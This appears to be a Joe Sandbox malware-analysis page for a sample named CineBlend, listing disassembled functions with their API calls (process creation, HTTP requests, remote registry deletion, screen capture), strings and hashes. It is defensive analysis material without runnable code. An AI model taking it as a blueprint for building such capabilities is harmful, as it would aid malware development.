Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: cf5774108ad44723fbad7aec1612a132cad9e732092d8c3266a608e588dacba0
Instruction ID: a7bfa3846b2d18b0cb6453f7581c542b6b629bb938dba73ede58aa45b4af66b6
Opcode Fuzzy Hash: cf5774108ad44723fbad7aec1612a132cad9e732092d8c3266a608e588dacba0
Instruction Fuzzy Hash: DAE1F332A08516ABCB149F74C8816EDFBF1FF16B10F1041A9F456E7290EB309E55D7A0

Function 00BB4F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00BDDCD0), ref: 00BB4F6C
_wcslen.LIBCMT ref: 00BB4F80
_wcslen.LIBCMT ref: 00BB4FDE
_wcslen.LIBCMT ref: 00BB5039
_wcslen.LIBCMT ref: 00BB5084
_wcslen.LIBCMT ref: 00BB50EC

Part of subcall function 00B5FD52: _wcslen.LIBCMT ref: 00B5FD5D

GetDriveTypeW.KERNEL32(?,00C07C10,00000061), ref: 00BB5188

Strings

all, xrefs: 00BB4F76, 00BB4F7B
ramdisk, xrefs: 00BB5136
cdrom, xrefs: 00BB4FD4, 00BB4FD9
fixed, xrefs: 00BB507A, 00BB507F
removable, xrefs: 00BB502F, 00BB5034
unknown, xrefs: 00BB514D
network, xrefs: 00BB50E2, 00BB50E7

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: a7b265da1e42ec49b763fdb96e63843740796e39e1261e39539964a73784dae9
Instruction ID: 2098a6410d35788dbcd183ba2e810c74d05e6e96e6e31353b816b261a74c1f60
Opcode Fuzzy Hash: a7b265da1e42ec49b763fdb96e63843740796e39e1261e39539964a73784dae9
Instruction Fuzzy Hash: 50B1C1316087029FC724EF28C890BBAB7E5FFA4710F50499DF49697292DBB0D944CA93

Function 00BCBA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BCBBF8
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BCBC10
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BCBC34
_wcslen.LIBCMT ref: 00BCBC60
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BCBC74
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BCBC96
_wcslen.LIBCMT ref: 00BCBD92

Part of subcall function 00BB0F4E: GetStdHandle.KERNEL32(000000F6), ref: 00BB0F6D

_wcslen.LIBCMT ref: 00BCBDAB
_wcslen.LIBCMT ref: 00BCBDC6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BCBE16
GetLastError.KERNEL32(00000000), ref: 00BCBE67
CloseHandle.KERNEL32(?), ref: 00BCBE99
CloseHandle.KERNEL32(00000000), ref: 00BCBEAA
CloseHandle.KERNEL32(00000000), ref: 00BCBEBC
CloseHandle.KERNEL32(00000000), ref: 00BCBECE
CloseHandle.KERNEL32(?), ref: 00BCBF43

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: e4c05b4d418a5f34b38a3504139ee92be054824e91199aecd673c4b9e7c200f5
Instruction ID: c9207a394f4cd05421797aef0f56cbf5c2850323f1f9c6736c3aae8923fd6b49
Opcode Fuzzy Hash: e4c05b4d418a5f34b38a3504139ee92be054824e91199aecd673c4b9e7c200f5
Instruction Fuzzy Hash: A5F17B316042019FCB14EF24C892F6EBBE5EF85310F18899DF4969B2A2DB71DD45CB52

Function 00BC4A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00BDDCD0), ref: 00BC4B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00BC4B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00BDDCD0), ref: 00BC4B4F
FreeLibrary.KERNEL32(00000000,?,00BDDCD0), ref: 00BC4B9B
StringFromGUID2.OLE32(?,?,00000028,?,00BDDCD0), ref: 00BC4C05
SysFreeString.OLEAUT32(00000009), ref: 00BC4CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00BC4D25
SysFreeString.OLEAUT32(?), ref: 00BC4D4F

Strings

kernel32.dll, xrefs: 00BC4B13
GetModuleHandleExW, xrefs: 00BC4B24

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: 15c97f272019f520be30bca19851f0c67e05b1fb762f6541c80ce4ec7adfceca
Instruction ID: 5af8456b73cba397522acaea1e5cd3e53774c866b113486ad85fc50884830982
Opcode Fuzzy Hash: 15c97f272019f520be30bca19851f0c67e05b1fb762f6541c80ce4ec7adfceca
Instruction Fuzzy Hash: 43121871A00115AFDB14DF94C894EAABBF5FF45314F24809CF949AB261DB31EE46CBA0

Function 00B4381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00C129C0), ref: 00B83F72
GetMenuItemCount.USER32(00C129C0), ref: 00B84022
GetCursorPos.USER32(?), ref: 00B84066
SetForegroundWindow.USER32(00000000), ref: 00B8406F
TrackPopupMenuEx.USER32(00C129C0,00000000,?,00000000,00000000,00000000), ref: 00B84082
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B8408E

Strings

0, xrefs: 00B4382D

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: e3b48b6066042aa579836c486425830bdc02aa45407f558d0444c7e51cb13f44
Instruction ID: 9ebd601aa8efdd26e180d709bf060eb257b3d9d3be92825790b98f7fba786416
Opcode Fuzzy Hash: e3b48b6066042aa579836c486425830bdc02aa45407f558d0444c7e51cb13f44
Instruction Fuzzy Hash: 63710930A44205BFEB21AF29DC89FAAFFE5FF05B64F140296F614661E0C7719A50DB90

Function 00BD7711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00BD7823

Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BD7897
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BD78B9
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BD78CC
DestroyWindow.USER32(?), ref: 00BD78ED
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B40000,00000000), ref: 00BD791C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BD7935
GetDesktopWindow.USER32 ref: 00BD794E
GetWindowRect.USER32(00000000), ref: 00BD7955
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BD796D
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BD7985

Part of subcall function 00B42234: GetWindowLongW.USER32(?,000000EB), ref: 00B42242

Strings

0, xrefs: 00BD77D0
tooltips_class32, xrefs: 00BD7890, 00BD7915

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: ba92a64a90b6cc5fcce50737c51d7d7659e1e9f12873ec24341a94d93abafa7d
Instruction ID: 138b537f8ebe9f4d099027c1b8c203ae4c08bd78df60ecf627d139532da7e993
Opcode Fuzzy Hash: ba92a64a90b6cc5fcce50737c51d7d7659e1e9f12873ec24341a94d93abafa7d
Instruction Fuzzy Hash: D6718571148241AFD725CF18CC58FAAFBE9FB8A300F04449FF985872A1EB75A906DB11

Function 00BD9B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B424B0

DragQueryPoint.SHELL32(?,?), ref: 00BD9BA3

Part of subcall function 00BD80AE: ClientToScreen.USER32(?,?), ref: 00BD80D4
Part of subcall function 00BD80AE: GetWindowRect.USER32(?,?), ref: 00BD814A
Part of subcall function 00BD80AE: PtInRect.USER32(?,?,?), ref: 00BD815A

SendMessageW.USER32(?,000000B0,?,?), ref: 00BD9C0C
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00BD9C17
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00BD9C3A
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00BD9C81
SendMessageW.USER32(?,000000B0,?,?), ref: 00BD9C9A
SendMessageW.USER32(?,000000B1,?,?), ref: 00BD9CB1
SendMessageW.USER32(?,000000B1,?,?), ref: 00BD9CD3
DragFinish.SHELL32(?), ref: 00BD9CDA
DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00BD9DCD

Strings

@GUI_DRAGFILE, xrefs: 00BD9D7C
@GUI_DROPID, xrefs: 00BD9CFA
@GUI_DRAGID, xrefs: 00BD9D45

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 4724dfe292e2d42f589ad12ab7e7ecd8c6d0da2752aedb3887b6a01fe761f231
Instruction ID: 2148fdc021f80a4a0e5befd3d3098968fdb5a5723827470e25e1b4adc0bf0942
Opcode Fuzzy Hash: 4724dfe292e2d42f589ad12ab7e7ecd8c6d0da2752aedb3887b6a01fe761f231
Instruction Fuzzy Hash: D3615971108301AFC701EF64DC85E9FBBE8EF89750F40096EF691932A1EB309A49DB52

Function 00BBCEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BBCEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00BBCF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00BBCF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00BBCF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00BBCF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00BBCF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BBCF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00BBCFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00BBD021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00BBD035
InternetCloseHandle.WININET(00000000), ref: 00BBD040

Strings

, xrefs: 00BBCFBA

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 0e8f1a6fd8c6ec5edb8bab81d15ca751abf3c38e70398ee7fbe657280f7f90c0
Instruction ID: fee1eee6f9181192d6c591ddf3db08180f6b811944c351ecd4d1aab73881a457
Opcode Fuzzy Hash: 0e8f1a6fd8c6ec5edb8bab81d15ca751abf3c38e70398ee7fbe657280f7f90c0
Instruction Fuzzy Hash: AA513BB1501608BFDB219F60CC98AFABBFCFF08754F40449AF98597150EB74D949AB60

Function 00BD8FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00BD66D6,?,?), ref: 00BD8FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00BD66D6,?,?,00000000,?), ref: 00BD8FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00BD66D6,?,?,00000000,?), ref: 00BD9009
CloseHandle.KERNEL32(00000000,?,?,?,?,00BD66D6,?,?,00000000,?), ref: 00BD9016
GlobalLock.KERNEL32(00000000), ref: 00BD9024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00BD66D6,?,?,00000000,?), ref: 00BD9033
GlobalUnlock.KERNEL32(00000000), ref: 00BD903C
CloseHandle.KERNEL32(00000000,?,?,?,?,00BD66D6,?,?,00000000,?), ref: 00BD9043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00BD66D6,?,?,00000000,?), ref: 00BD9054
OleLoadPicture.OLEAUT32(?,00000000,00000000,00BE0C04,?), ref: 00BD906D
GlobalFree.KERNEL32(00000000), ref: 00BD907D
GetObjectW.GDI32(00000000,00000018,?), ref: 00BD909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00BD90CD
DeleteObject.GDI32(00000000), ref: 00BD90F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00BD910B

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 0c73cde0e9de4a1312ef77192a317449c9c41ab54d6b5fd5f4897a8247eeb9e2
Instruction ID: 19ac48a8cf997d795321980981902af1b161f843c1ed29a8ad530330af9477fb
Opcode Fuzzy Hash: 0c73cde0e9de4a1312ef77192a317449c9c41ab54d6b5fd5f4897a8247eeb9e2
Instruction Fuzzy Hash: 29413A75601208BFDB119F65DC88EAABBF8FF89711F10405AF945E7260EB709D41DB60

Function 00BCC06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333

Part of subcall function 00BCD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCC10E,?,?), ref: 00BCD415
Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD451
Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD4C8
Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BCC154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BCC1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 00BCC26A
RegCloseKey.ADVAPI32(?), ref: 00BCC2DE
RegCloseKey.ADVAPI32(?), ref: 00BCC2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00BCC352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BCC364
RegDeleteKeyW.ADVAPI32(?,?), ref: 00BCC382
FreeLibrary.KERNEL32(00000000), ref: 00BCC3E3
RegCloseKey.ADVAPI32(00000000), ref: 00BCC3F4

Strings

RegDeleteKeyExW, xrefs: 00BCC35E
advapi32.dll, xrefs: 00BCC34D

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 79993d1864850a0eed85afdb877c64b4a7e626483216fb4c730d3f46b190244f
Instruction ID: c9e0765c2d875967d83f13a275eb1be0e9a17f51c8b0a0b96c5133f8ceaca4c8
Opcode Fuzzy Hash: 79993d1864850a0eed85afdb877c64b4a7e626483216fb4c730d3f46b190244f
Instruction Fuzzy Hash: 1EC16D35204241AFD710DF24C895F2ABBE1FF94314F1885DDE4AA9B2A2CB71ED46CB91

Function 00BC2FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00BC3035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00BC3045
CreateCompatibleDC.GDI32(?), ref: 00BC3051
SelectObject.GDI32(00000000,?), ref: 00BC305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00BC30CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00BC3109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00BC312D
SelectObject.GDI32(?,?), ref: 00BC3135
DeleteObject.GDI32(?), ref: 00BC313E
DeleteDC.GDI32(?), ref: 00BC3145
ReleaseDC.USER32(00000000,?), ref: 00BC3150

Strings

(, xrefs: 00BC30EA

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 5417891ac3e0daebf7c60202dff98fc3648b383149a6b7db1d72be334015415b
Instruction ID: e101f8ee63817161a4163caa43e0636aa671de87fa4bc439a9ab993454b86490
Opcode Fuzzy Hash: 5417891ac3e0daebf7c60202dff98fc3648b383149a6b7db1d72be334015415b
Instruction Fuzzy Hash: 4361D275D01219AFCF04CFA4D884EAEBBF5FF48710F20855AE555A7250E771A941CF90

Function 00B7DDDD Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00B7DE21

Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7D9D9
Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7D9EB
Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7D9FD
Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DA0F
Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DA21
Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DA33
Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DA45
Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DA57
Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DA69
Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DA7B
Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DA8D
Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DA9F
Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DAB1

_free.LIBCMT ref: 00B7DE16

Part of subcall function 00B72D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?), ref: 00B72D4E
Part of subcall function 00B72D38: GetLastError.KERNEL32(?,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?,?), ref: 00B72D60

_free.LIBCMT ref: 00B7DE38
_free.LIBCMT ref: 00B7DE4D
_free.LIBCMT ref: 00B7DE58
_free.LIBCMT ref: 00B7DE7A
_free.LIBCMT ref: 00B7DE8D
_free.LIBCMT ref: 00B7DE9B
_free.LIBCMT ref: 00B7DEA6
_free.LIBCMT ref: 00B7DEDE
_free.LIBCMT ref: 00B7DEE5
_free.LIBCMT ref: 00B7DF02
_free.LIBCMT ref: 00B7DF1A

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: b4d78faaafb1a131bfdea4764649da49e54eb26515eecd07f1db2635143d3bf0
Instruction ID: 064597052c1039108c76f1f90e6a2991c69fad636319b4a725fbae2b23309f9e
Opcode Fuzzy Hash: b4d78faaafb1a131bfdea4764649da49e54eb26515eecd07f1db2635143d3bf0
Instruction Fuzzy Hash: 19311771604605DFEF32AB38D845B5A73F9EF20390F5088E9E46DDB192DB71A880CB20

Function 00BDA94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B424B0

GetSystemMetrics.USER32(0000000F), ref: 00BDA990
GetSystemMetrics.USER32(00000011), ref: 00BDA9A7
GetSystemMetrics.USER32(00000004), ref: 00BDA9B3
GetSystemMetrics.USER32(0000000F), ref: 00BDA9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00BDAC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00BDAC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00BDAC54
ShowWindow.USER32(00000003,00000000), ref: 00BDAC73
InvalidateRect.USER32(?,00000000,00000001), ref: 00BDAC95
DefDlgProcW.USER32(?,00000005,?), ref: 00BDACBB

Strings

@, xrefs: 00BDABD0

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
